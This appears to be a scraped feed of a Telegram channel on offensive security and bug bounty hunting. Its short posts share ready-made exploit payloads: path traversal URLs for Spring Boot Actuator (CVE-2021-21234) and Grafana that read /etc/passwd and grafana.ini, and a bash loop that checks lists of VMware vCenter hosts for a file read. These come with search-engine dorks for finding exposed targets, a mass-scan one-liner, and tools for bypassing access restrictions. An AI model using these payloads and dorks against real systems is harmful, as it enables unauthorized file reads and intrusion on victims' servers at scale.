This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
4-ZERO-3

Tool to bypass 403/401. This script contains all the possible techniques to do the same.

https://github.com/Dheerajmadhukar/4-ZERO-3

#forbidden #bypass #bugbounty
Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)

http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details:
https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/

#spring #actuator #cve #bugbounty
VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS

cat target.txt | while read host; do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd" | grep "root:x" && echo "$host Vulnerable"; done

Shodan Dorks:
http.title:"ID_VC_Welcome"

Zoomeye Dorks:
app:"VMware vCenter"

https://github.com/l0ggg/VMware_vCenter

#vmware #vcenter #bugbounty
Grafana — Unauthorized Arbitrary Read File

The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+

Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini

The "plugin-id" could be any plugin that exists in the system

One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest
ipsourcebypass

This Python script can be used to bypass IP source restrictions using HTTP headers.

https://github.com/p0dalirius/ipsourcebypass

#ip #header #bypass #bugbounty
Bug Bounty Tip — Log4j Vulnerability Cheatsheet

— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)

#log4j #cheatsheet #bugbounty
Osmedeus

Fully automated offensive security framework for reconnaissance and vulnerability scanning

Features
— Subdomain Scan.
— Subdomain TakeOver Scan.
— Screenshot the target.
— Basic recon like Whois, Dig info.
— Web Technology detection.
— IP Discovery.
— CORS Scan.
— SSL Scan.
— Wayback Machine Discovery.
— URL Discovery.
— Headers Scan.
— Port Scan.
— Vulnerable Scan.
— Separate workspaces to store all scan output and detailed logging.
— REST API.
— React Web UI.
— Support Continuous Scan.
— Slack notifications.
— Easily view report from command line.

https://github.com/j3ssie/Osmedeus

#osint #vulnerability #scanner #bugbounty
API Guesser

A simple website to guess API Key / OAuth Token

When you do pentest / GitHub recon and find an API key / OAuth token but you don't know what API key it is, you can use my website that I built in JavaScript.

https://api-guesser.netlify.app

Source:
https://github.com/daffainfo/apiguesser-web

#api #token #osint #bugbounty